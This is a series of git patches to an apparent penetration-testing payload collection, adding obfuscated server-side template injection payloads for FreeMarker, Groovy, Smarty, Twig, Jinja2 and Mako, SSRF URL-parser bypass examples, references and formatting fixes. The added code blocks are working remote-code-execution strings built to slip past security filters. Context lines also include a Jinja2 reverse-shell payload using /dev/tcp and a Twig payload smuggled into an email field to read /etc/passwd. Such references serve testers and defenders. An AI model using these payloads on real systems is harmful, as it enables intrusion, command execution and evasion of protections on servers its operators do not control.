From 52daa1d8205c42e1962ae937437b86078a68ede3 Mon Sep 17 00:00:00 2001 From: brumens <68474266+Brum3ns@users.noreply.github.com> Date: Wed, 3 Dec 2025 13:58:27 +0100 Subject: [PATCH 01/12] Updated SSTI Reference --- Server Side Template Injection/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index f7a79f5e88..9e0f1ca7a3 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -95,3 +95,4 @@ Once the template engine is identified, the attacker injects more complex expres - [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - August 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9) - [Template Engines Injection 101 - Mahmoud M. Awali - November 1, 2024](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756) - [Template Injection On Hardened Targets - Lucas 'BitK' Philippe - September 28, 2022](https://youtu.be/M0b_KA0OMFw) +- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - YesWeHack, Brumens - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation) \ No newline at end of file From 7ca2ca2a75016ce1a5e6a090da2522d313b76b63 Mon Sep 17 00:00:00 2001 From: brumens <68474266+Brum3ns@users.noreply.github.com> Date: Wed, 3 Dec 2025 13:58:49 +0100 Subject: [PATCH 02/12] Added Groovy and FreeMarker obf payloads --- Server Side Template Injection/Java.md | 30 ++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md index 85078d89d0..f23ecaa955 100644 --- a/Server Side Template Injection/Java.md +++ b/Server Side Template Injection/Java.md @@ -13,6 +13,7 @@ - [Freemarker - Basic Injection](#freemarker---basic-injection) - [Freemarker - Read File](#freemarker---read-file) - [Freemarker - Code Execution](#freemarker---code-execution) + - [Freemarker - Code Execution with Obfuscation](#freemarker---code-execution-with-obfuscation) - [Freemarker - Sandbox Bypass](#freemarker---sandbox-bypass) - [Codepen](#codepen) - [Jinjava](#jinjava) @@ -27,6 +28,7 @@ - [Groovy - Read File](#groovy---read-file) - [Groovy - HTTP Request:](#groovy---http-request) - [Groovy - Command Execution](#groovy---command-execution) + - [Groovy - Command Execution with Obfuscation](#groovy---command-execution-with-obfuscation) - [Groovy - Sandbox Bypass](#groovy---sandbox-bypass) - [Spring Expression Language](#spring-expression-language) - [SpEL - Basic Injection](#spel---basic-injection) @@ -110,6 +112,20 @@ ${"freemarker.template.utility.Execute"?new()("id")} [="freemarker.template.utility.Execute"?new()("id")] ``` +### Freemarker - Code Execution with Obfuscation + +FreeMarker offers the built-in function: `lower_abc`. This function converts int-based values into alphabetic strings, but not in the way you might expect from functions such as `chr` in Python, as the [documentation for lower_abc explains](https://freemarker.apache.org/docs/ref_builtins_number.html#ref_builtin_lower_abc): + +If you wanted a string that represents the string: "id", you could use the payload: `${9?lower_abc+4?lower_abc)}`. + + +Chaining `lower_abc` to perform code execution (command: `id`): +```js +${(6?lower_abc+18?lower_abc+5?lower_abc+5?lower_abc+13?lower_abc+1?lower_abc+18?lower_abc+11?lower_abc+5?lower_abc+18?lower_abc+1.1?c[1]+20?lower_abc+5?lower_abc+13?lower_abc+16?lower_abc+12?lower_abc+1?lower_abc+20?lower_abc+5?lower_abc+1.1?c[1]+21?lower_abc+20?lower_abc+9?lower_abc+12?lower_abc+9?lower_abc+20?lower_abc+25?lower_abc+1.1?c[1]+5?upper_abc+24?lower_abc+5?lower_abc+3?lower_abc+21?lower_abc+20?lower_abc+5?lower_abc)?new()(9?lower_abc+4?lower_abc)} +``` + +Reference and explanation of payload can be found [here](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation). + ### Freemarker - Sandbox Bypass :warning: only works on Freemarker versions below 2.3.30 @@ -293,6 +309,19 @@ ${this.evaluate("9*9") //(this is a Script class)} ${new org.codehaus.groovy.runtime.MethodClosure("calc.exe","execute").call()} ``` +### Groovy - Command Execution with Obfuscation + +You can bypass security filters by constructing strings from ASCII codes and executing them as system commands. + +Payload represent the string: `id`: `${((char)105).toString()+((char)100).toString()}`. + +Execute system command (command: `id`): +```groovy +${x=new/**/String();for(i/**/in[105,100]){x+=((char)i).toString()};x.execute().text}${x=new/**/String();for(i/**/in[105,100]){x+=((char)i).toString()};x.execute().text} +``` + +Reference and explanation of payload can be found [here](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation). + ### Groovy - Sandbox Bypass ```groovy @@ -390,3 +419,4 @@ ${pageContext.request.getSession().setAttribute("admin",true)} - [Leveraging the Spring Expression Language (SpEL) injection vulnerability (a.k.a The Magic SpEL) to get RCE - Xenofon Vassilakopoulos - November 18, 2021](https://xen0vas.github.io/Leveraging-the-SpEL-Injection-Vulnerability-to-get-RCE/) - [RCE in Hubspot with EL injection in HubL - @fyoorer - December 7, 2018](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html) - [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - January 29, 2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf) +- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - YesWeHack, Brumens - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation) \ No newline at end of file From e2ce1c96dc872b08575478ae780fbb3863eaaf15 Mon Sep 17 00:00:00 2001 From: brumens <68474266+Brum3ns@users.noreply.github.com> Date: Wed, 3 Dec 2025 14:05:41 +0100 Subject: [PATCH 03/12] Added Smarty and Twig obf payload --- Server Side Template Injection/PHP.md | 33 ++++++++++++++++++++++++++- 1 file changed, 32 insertions(+), 1 deletion(-) diff --git a/Server Side Template Injection/PHP.md b/Server Side Template Injection/PHP.md index cc3618c315..b176f231a9 100644 --- a/Server Side Template Injection/PHP.md +++ b/Server Side Template Injection/PHP.md @@ -5,12 +5,15 @@ ## Summary - [Templating Libraries](#templating-libraries) +- [blade](#blade) - [Smarty](#smarty) + - [Smarty - Code Execution with Obfuscation](#smarty---code-execution-with-obfuscation) - [Twig](#twig) - [Twig - Basic Injection](#twig---basic-injection) - [Twig - Template Format](#twig---template-format) - [Twig - Arbitrary File Reading](#twig---arbitrary-file-reading) - [Twig - Code Execution](#twig---code-execution) + - [Twig - Code Execution with Obfuscation](#twig---code-execution-with-obfuscation) - [Latte](#latte) - [Latte - Basic Injection](#latte---basic-injection) - [Latte - Code Execution](#latte---code-execution) @@ -41,6 +44,8 @@ The string `id` is generated with `{{implode(null,array_map(chr(99).chr(104).chr {{passthru(implode(null,array_map(chr(99).chr(104).chr(114),[105,100])))}} ``` +Reference and explanation of payload can be found [here](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation). + --- ## Smarty @@ -56,6 +61,17 @@ The string `id` is generated with `{{implode(null,array_map(chr(99).chr(104).chr {system('cat index.php')} // compatible v3 ``` +### Smarty - Code Execution with Obfuscation + +By employing the variable modifier `cat`, individual characters are concatenated to form the string "id" as follows: `{chr(105)|cat:chr(100)}`. + +Execute system comman (command: `id`): +```php +{{passthru(implode(Null,array_map(chr(99)|cat:chr(104)|cat:chr(114),[105,100])))}} +``` + +Reference and explanation of payload can be found [here](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation). + --- ## Twig @@ -124,6 +140,21 @@ POST /subscribe?0=cat+/etc/passwd HTTP/1.1 email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld ``` +### Twig - Code Execution with Obfuscation + +Twig's block feature and built-in `_charset` variable can be nesting can be used to produced the payload (command: `id`) + +```twig +{%block U%}id000passthru{%endblock%}{%set x=block(_charset|first)|split(000)%}{{[x|first]|map(x|last)|join}} +``` + +The following payload, which harnesses the built-in `_context` variable, also achieves RCE – provided that the template engine performs a double-rendering process: +```twig +{{id~passthru~_context|join|slice(2,2)|split(000)|map(_context|join|slice(5,8))}} +``` + +Reference and explanation of payload can be found [here](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation). + --- ## Latte @@ -262,5 +293,5 @@ layout template: ## References -- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere- YesWeHack - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation) +- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - YesWeHack, Brumens - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation) - [Server Side Template Injection (SSTI) via Twig escape handler - March 21, 2024](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58) From 3cf745b90c4af4d9fc08a2c56ae8004de2f5abb8 Mon Sep 17 00:00:00 2001 From: brumens <68474266+Brum3ns@users.noreply.github.com> Date: Wed, 3 Dec 2025 14:07:37 +0100 Subject: [PATCH 04/12] Added Jinja and Mako obf payloads --- Server Side Template Injection/Python.md | 29 ++++++++++++++++++++++++ 1 file changed, 29 insertions(+) diff --git a/Server Side Template Injection/Python.md b/Server Side Template Injection/Python.md index 056d605710..3bf8b7645b 100644 --- a/Server Side Template Injection/Python.md +++ b/Server Side Template Injection/Python.md @@ -26,12 +26,14 @@ - [Exploit The SSTI By Calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen) - [Exploit The SSTI By Calling Popen Without Guessing The Offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset) - [Exploit The SSTI By Writing an Evil Config File](#exploit-the-ssti-by-writing-an-evil-config-file) + - [Jinja2 - Remote Command Execution with Obfuscation](#jinja2---remote-command-execution-with-obfuscation) - [Jinja2 - Filter Bypass](#jinja2---filter-bypass) - [Tornado](#tornado) - [Tornado - Basic Injection](#tornado---basic-injection) - [Tornado - Remote Command Execution](#tornado---remote-command-execution) - [Mako](#mako) - [Mako - Remote Command Execution](#mako---remote-command-execution) + - [Mako - Remote Command Execution with Obfuscation](#mako---remote-command-execution-with-obfuscation) - [References](#references) ## Templating Libraries @@ -260,6 +262,17 @@ Simple modification of the payload to clean up output and facilitate command inp {{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }} ``` +### Jinja2 - Remote Command Execution with Obfuscation + +Write the string: `id` using the index position of a known existing string (the index value may vary depending on the target): `{{self.__init__.__globals__.__str__()[1786:1788]}}`. + +Execute the system command `id`: +```python +{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen(self.__init__.__globals__.__str__()[1786:1788]).read()}} +``` + +Reference and explanation of payload can be found [here](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation). + ### Jinja2 - Filter Bypass ```python @@ -400,6 +413,21 @@ PoC : ``` +### Mako - Remote Command Execution with Obfuscation + +In Mako, the following payload can be used to generates the string "id": `${str().join(chr(i)for(i)in[105,100])}`. + +Execute the system command `id`: +```python +${self.module.cache.util.os.popen(str().join(chr(i)for(i)in[105,100])).read()} +``` + +```python +<%import os%>${os.popen(str().join(chr(i)for(i)in[105,100])).read()} +``` + +Reference and explanation of payload can be found [here](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation). + ## References - [Cheatsheet - Flask & Jinja2 SSTI - phosphore - September 3, 2018](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti) @@ -407,3 +435,4 @@ PoC : - [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/) - [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/) - [The minefield between syntaxes: exploiting syntax confusions in the wild - YesWeHack - October 17, 2025](https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits) +- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - YesWeHack, Brumens - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation) From 5f1a39d272115ea601b30977832b80337f366232 Mon Sep 17 00:00:00 2001 From: brumens <68474266+Brum3ns@users.noreply.github.com> Date: Wed, 3 Dec 2025 14:09:02 +0100 Subject: [PATCH 05/12] Added author to research reference --- Server Side Template Injection/Python.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Server Side Template Injection/Python.md b/Server Side Template Injection/Python.md index 3bf8b7645b..ec32c8c0cc 100644 --- a/Server Side Template Injection/Python.md +++ b/Server Side Template Injection/Python.md @@ -434,5 +434,5 @@ Reference and explanation of payload can be found [here](https://www.yeswehack.c - [Exploring SSTI in Flask/Jinja2, Part II - Tim Tomes - March 11, 2016](https://web.archive.org/web/20170710015954/https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) - [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/) - [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/) -- [The minefield between syntaxes: exploiting syntax confusions in the wild - YesWeHack - October 17, 2025](https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits) +- [The minefield between syntaxes: exploiting syntax confusions in the wild - YesWeHack, Brumens - October 17, 2025](https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits) - [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - YesWeHack, Brumens - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation) From a957c3f96d8fa5616099b0eefffca10ed318ec57 Mon Sep 17 00:00:00 2001 From: brumens <68474266+Brum3ns@users.noreply.github.com> Date: Mon, 15 Dec 2025 11:30:06 +0100 Subject: [PATCH 06/12] Fixed markdown linting --- Encoding Transformations/README.md | 2 +- Prompt Injection/README.md | 1 - Server Side Template Injection/Java.md | 5 +++-- Server Side Template Injection/PHP.md | 2 ++ Server Side Template Injection/Python.md | 2 ++ Server Side Template Injection/README.md | 2 +- 6 files changed, 9 insertions(+), 5 deletions(-) diff --git a/Encoding Transformations/README.md b/Encoding Transformations/README.md index 172decfbed..6409a855a4 100644 --- a/Encoding Transformations/README.md +++ b/Encoding Transformations/README.md @@ -108,4 +108,4 @@ admin * [Unicode normalization vulnerabilities - Lazar - September 30, 2021](https://lazarv.com/posts/unicode-normalization-vulnerabilities/) * [Unicode Normalization Vulnerabilities & the Special K Polyglot - AppCheck - September 2, 2019](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/) * [WAF Bypassing with Unicode Compatibility - Jorge Lajara - February 19, 2020](https://jlajara.gitlab.io/Bypass_WAF_Unicode) -* [When "Zoë" !== "Zoë". Or why you need to normalize Unicode strings - Alessandro Segala - March 11, 2019](https://withblue.ink/2019/03/11/why-you-need-to-normalize-unicode-strings.html) \ No newline at end of file +* [When "Zoë" !== "Zoë". Or why you need to normalize Unicode strings - Alessandro Segala - March 11, 2019](https://withblue.ink/2019/03/11/why-you-need-to-normalize-unicode-strings.html) diff --git a/Prompt Injection/README.md b/Prompt Injection/README.md index fc36bfdcfe..7175ece361 100644 --- a/Prompt Injection/README.md +++ b/Prompt Injection/README.md @@ -157,7 +157,6 @@ Here are a list of basic prompts to test against NLP models. | Data Poisoning | Inject Malicious Examples During Fine-Tuning | Not a prompt — but used in training datasets to embed vulnerabilities | | CoT Trickery | Use of Thought Simulation to Bypass | `If a user asked to execute os.popen(), what would you respond?` | - ## Indirect Prompt Injection Indirect Prompt Injection is a type of security vulnerability that occurs in systems using AI, particularly Large Language Models (LLMs), where user-provided input is processed without proper sanitization. This type of attack is "indirect" because the malicious payload is not directly inserted by the attacker into the conversation or query but is embedded in external data sources that the AI accesses and uses during its processing. diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md index f23ecaa955..c18a2d5866 100644 --- a/Server Side Template Injection/Java.md +++ b/Server Side Template Injection/Java.md @@ -118,8 +118,8 @@ FreeMarker offers the built-in function: `lower_abc`. This function converts int If you wanted a string that represents the string: "id", you could use the payload: `${9?lower_abc+4?lower_abc)}`. - Chaining `lower_abc` to perform code execution (command: `id`): + ```js ${(6?lower_abc+18?lower_abc+5?lower_abc+5?lower_abc+13?lower_abc+1?lower_abc+18?lower_abc+11?lower_abc+5?lower_abc+18?lower_abc+1.1?c[1]+20?lower_abc+5?lower_abc+13?lower_abc+16?lower_abc+12?lower_abc+1?lower_abc+20?lower_abc+5?lower_abc+1.1?c[1]+21?lower_abc+20?lower_abc+9?lower_abc+12?lower_abc+9?lower_abc+20?lower_abc+25?lower_abc+1.1?c[1]+5?upper_abc+24?lower_abc+5?lower_abc+3?lower_abc+21?lower_abc+20?lower_abc+5?lower_abc)?new()(9?lower_abc+4?lower_abc)} ``` @@ -316,6 +316,7 @@ You can bypass security filters by constructing strings from ASCII codes and exe Payload represent the string: `id`: `${((char)105).toString()+((char)100).toString()}`. Execute system command (command: `id`): + ```groovy ${x=new/**/String();for(i/**/in[105,100]){x+=((char)i).toString()};x.execute().text}${x=new/**/String();for(i/**/in[105,100]){x+=((char)i).toString()};x.execute().text} ``` @@ -419,4 +420,4 @@ ${pageContext.request.getSession().setAttribute("admin",true)} - [Leveraging the Spring Expression Language (SpEL) injection vulnerability (a.k.a The Magic SpEL) to get RCE - Xenofon Vassilakopoulos - November 18, 2021](https://xen0vas.github.io/Leveraging-the-SpEL-Injection-Vulnerability-to-get-RCE/) - [RCE in Hubspot with EL injection in HubL - @fyoorer - December 7, 2018](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html) - [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - January 29, 2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf) -- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - YesWeHack, Brumens - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation) \ No newline at end of file +- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - YesWeHack, Brumens - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation) diff --git a/Server Side Template Injection/PHP.md b/Server Side Template Injection/PHP.md index b176f231a9..8cb1443b70 100644 --- a/Server Side Template Injection/PHP.md +++ b/Server Side Template Injection/PHP.md @@ -66,6 +66,7 @@ Reference and explanation of payload can be found [here](https://www.yeswehack.c By employing the variable modifier `cat`, individual characters are concatenated to form the string "id" as follows: `{chr(105)|cat:chr(100)}`. Execute system comman (command: `id`): + ```php {{passthru(implode(Null,array_map(chr(99)|cat:chr(104)|cat:chr(114),[105,100])))}} ``` @@ -149,6 +150,7 @@ Twig's block feature and built-in `_charset` variable can be nesting can be used ``` The following payload, which harnesses the built-in `_context` variable, also achieves RCE – provided that the template engine performs a double-rendering process: + ```twig {{id~passthru~_context|join|slice(2,2)|split(000)|map(_context|join|slice(5,8))}} ``` diff --git a/Server Side Template Injection/Python.md b/Server Side Template Injection/Python.md index ec32c8c0cc..6a50964372 100644 --- a/Server Side Template Injection/Python.md +++ b/Server Side Template Injection/Python.md @@ -267,6 +267,7 @@ Simple modification of the payload to clean up output and facilitate command inp Write the string: `id` using the index position of a known existing string (the index value may vary depending on the target): `{{self.__init__.__globals__.__str__()[1786:1788]}}`. Execute the system command `id`: + ```python {{self._TemplateReference__context.cycler.__init__.__globals__.os.popen(self.__init__.__globals__.__str__()[1786:1788]).read()}} ``` @@ -418,6 +419,7 @@ PoC : In Mako, the following payload can be used to generates the string "id": `${str().join(chr(i)for(i)in[105,100])}`. Execute the system command `id`: + ```python ${self.module.cache.util.os.popen(str().join(chr(i)for(i)in[105,100])).read()} ``` diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 9e0f1ca7a3..f36c825463 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -95,4 +95,4 @@ Once the template engine is identified, the attacker injects more complex expres - [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - August 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9) - [Template Engines Injection 101 - Mahmoud M. Awali - November 1, 2024](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756) - [Template Injection On Hardened Targets - Lucas 'BitK' Philippe - September 28, 2022](https://youtu.be/M0b_KA0OMFw) -- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - YesWeHack, Brumens - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation) \ No newline at end of file +- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - YesWeHack, Brumens - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation) From 09bdd83685c085862e2e25293e13718f31774826 Mon Sep 17 00:00:00 2001 From: RelunSec Date: Thu, 18 Dec 2025 23:41:37 -0800 Subject: [PATCH 07/12] Update README with URL parsing examples Added examples of URL formats and parser behaviors. --- Server Side Request Forgery/README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 26bc12961a..98c35d14e3 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -266,6 +266,7 @@ http://127.1.1.1:80\@127.2.2.2:80/ http://127.1.1.1:80\@@127.2.2.2:80/ http://127.1.1.1:80:\@@127.2.2.2:80/ http://127.1.1.1:80#\@127.2.2.2:80/ +http:127.0.0.1/ ``` ![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true) @@ -275,6 +276,7 @@ Parsing behavior by different libraries: `http://1.1.1.1 &@2.2.2.2# @3.3.3.3/` * `urllib2` treats `1.1.1.1` as the destination * `requests` and browsers redirect to `2.2.2.2` * `urllib` resolves to `3.3.3.3` +* Some parsers replace http:127.0.0.1/ to http://127.0.0.1 ### Bypass PHP filter_var() Function From c975f61fa0cfa71ac87af5f459e5c735f6767467 Mon Sep 17 00:00:00 2001 From: RelunSec Date: Fri, 19 Dec 2025 07:48:57 -0800 Subject: [PATCH 08/12] Fix typo in README regarding URL formatting --- Server Side Request Forgery/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 98c35d14e3..091de3b4ee 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -276,7 +276,7 @@ Parsing behavior by different libraries: `http://1.1.1.1 &@2.2.2.2# @3.3.3.3/` * `urllib2` treats `1.1.1.1` as the destination * `requests` and browsers redirect to `2.2.2.2` * `urllib` resolves to `3.3.3.3` -* Some parsers replace http:127.0.0.1/ to http://127.0.0.1 +* Some parsers replace http:127.0.0.1/ to http://127.0.0.1/ ### Bypass PHP filter_var() Function From bb325561a15887748e4bd6258120659f8270e7fb Mon Sep 17 00:00:00 2001 From: Joshua Rogers Date: Sat, 3 Jan 2026 23:33:52 +1100 Subject: [PATCH 09/12] add gixy-next --- Reverse Proxy Misconfigurations/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Reverse Proxy Misconfigurations/README.md b/Reverse Proxy Misconfigurations/README.md index f252193ab6..ce3b541466 100644 --- a/Reverse Proxy Misconfigurations/README.md +++ b/Reverse Proxy Misconfigurations/README.md @@ -21,6 +21,7 @@ ## Tools * [yandex/gixy](https://github.com/yandex/gixy) - Nginx configuration static analyzer. +- [Gixy-Next](https://gixy.io/) - Actively maintained Python3 fork of gixy. * [shiblisec/Kyubi](https://github.com/shiblisec/Kyubi) - A tool to discover Nginx alias traversal misconfiguration. * [laluka/bypass-url-parser](https://github.com/laluka/bypass-url-parser) - Tool that tests MANY url bypasses to reach a 40X protected page. From d345536ff477cc2b706781f43d1b042319ff24be Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 3 Jan 2026 15:47:05 +0100 Subject: [PATCH 10/12] Fix markdown linting --- Server Side Template Injection/Java.md | 16 ++++++++-------- Server Side Template Injection/PHP.md | 8 ++++---- Server Side Template Injection/Python.md | 8 ++++---- 3 files changed, 16 insertions(+), 16 deletions(-) diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md index c18a2d5866..94fb247f18 100644 --- a/Server Side Template Injection/Java.md +++ b/Server Side Template Injection/Java.md @@ -124,7 +124,7 @@ Chaining `lower_abc` to perform code execution (command: `id`): ${(6?lower_abc+18?lower_abc+5?lower_abc+5?lower_abc+13?lower_abc+1?lower_abc+18?lower_abc+11?lower_abc+5?lower_abc+18?lower_abc+1.1?c[1]+20?lower_abc+5?lower_abc+13?lower_abc+16?lower_abc+12?lower_abc+1?lower_abc+20?lower_abc+5?lower_abc+1.1?c[1]+21?lower_abc+20?lower_abc+9?lower_abc+12?lower_abc+9?lower_abc+20?lower_abc+25?lower_abc+1.1?c[1]+5?upper_abc+24?lower_abc+5?lower_abc+3?lower_abc+21?lower_abc+20?lower_abc+5?lower_abc)?new()(9?lower_abc+4?lower_abc)} ``` -Reference and explanation of payload can be found [here](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation). +Reference and explanation of payload can be found [yeswehack/server-side-template-injection-exploitation](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation). ### Freemarker - Sandbox Bypass @@ -321,7 +321,7 @@ Execute system command (command: `id`): ${x=new/**/String();for(i/**/in[105,100]){x+=((char)i).toString()};x.execute().text}${x=new/**/String();for(i/**/in[105,100]){x+=((char)i).toString()};x.execute().text} ``` -Reference and explanation of payload can be found [here](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation). +Reference and explanation of payload can be found [yeswehack/server-side-template-injection-exploitation](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation). ### Groovy - Sandbox Bypass @@ -408,16 +408,16 @@ ${pageContext.request.getSession().setAttribute("admin",true)} ## References -- [Server Side Template Injection – on the example of Pebble - Michał Bentkowski - September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/) -- [Server-Side Template Injection: RCE For The Modern Web App - James Kettle (@albinowax) - December 10, 2015](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98) -- [Server-Side Template Injection: RCE For The Modern Web App (PDF) - James Kettle (@albinowax) - August 8, 2015](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf) -- [Server-Side Template Injection: RCE For The Modern Web App (Video) - James Kettle (@albinowax) - December 28, 2015](https://www.youtube.com/watch?v=3cT0uE7Y87s) -- [VelocityServlet Expression Language injection - MagicBlue - November 15, 2017](https://magicbluech.github.io/2017/11/15/VelocityServlet-Expression-language-Injection/) - [Bean Stalking: Growing Java beans into RCE - Alvaro Munoz - July 7, 2020](https://securitylab.github.com/research/bean-validation-RCE) - [Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass - Peter M (@pmnh_) - December 4, 2022](https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/) - [Expression Language Injection - OWASP - December 4, 2019](https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection) - [Expression Language injection - PortSwigger - January 27, 2019](https://portswigger.net/kb/issues/00100f20_expression-language-injection) - [Leveraging the Spring Expression Language (SpEL) injection vulnerability (a.k.a The Magic SpEL) to get RCE - Xenofon Vassilakopoulos - November 18, 2021](https://xen0vas.github.io/Leveraging-the-SpEL-Injection-Vulnerability-to-get-RCE/) +- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - Brumens - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation) - [RCE in Hubspot with EL injection in HubL - @fyoorer - December 7, 2018](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html) - [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - January 29, 2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf) -- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - YesWeHack, Brumens - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation) +- [Server Side Template Injection – on the example of Pebble - Michał Bentkowski - September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/) +- [Server-Side Template Injection: RCE For The Modern Web App - James Kettle (@albinowax) - December 10, 2015](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98) +- [Server-Side Template Injection: RCE For The Modern Web App (PDF) - James Kettle (@albinowax) - August 8, 2015](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf) +- [Server-Side Template Injection: RCE For The Modern Web App (Video) - James Kettle (@albinowax) - December 28, 2015](https://www.youtube.com/watch?v=3cT0uE7Y87s) +- [VelocityServlet Expression Language injection - MagicBlue - November 15, 2017](https://magicbluech.github.io/2017/11/15/VelocityServlet-Expression-language-Injection/) diff --git a/Server Side Template Injection/PHP.md b/Server Side Template Injection/PHP.md index 8cb1443b70..94972bc3a6 100644 --- a/Server Side Template Injection/PHP.md +++ b/Server Side Template Injection/PHP.md @@ -44,7 +44,7 @@ The string `id` is generated with `{{implode(null,array_map(chr(99).chr(104).chr {{passthru(implode(null,array_map(chr(99).chr(104).chr(114),[105,100])))}} ``` -Reference and explanation of payload can be found [here](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation). +Reference and explanation of payload can be found 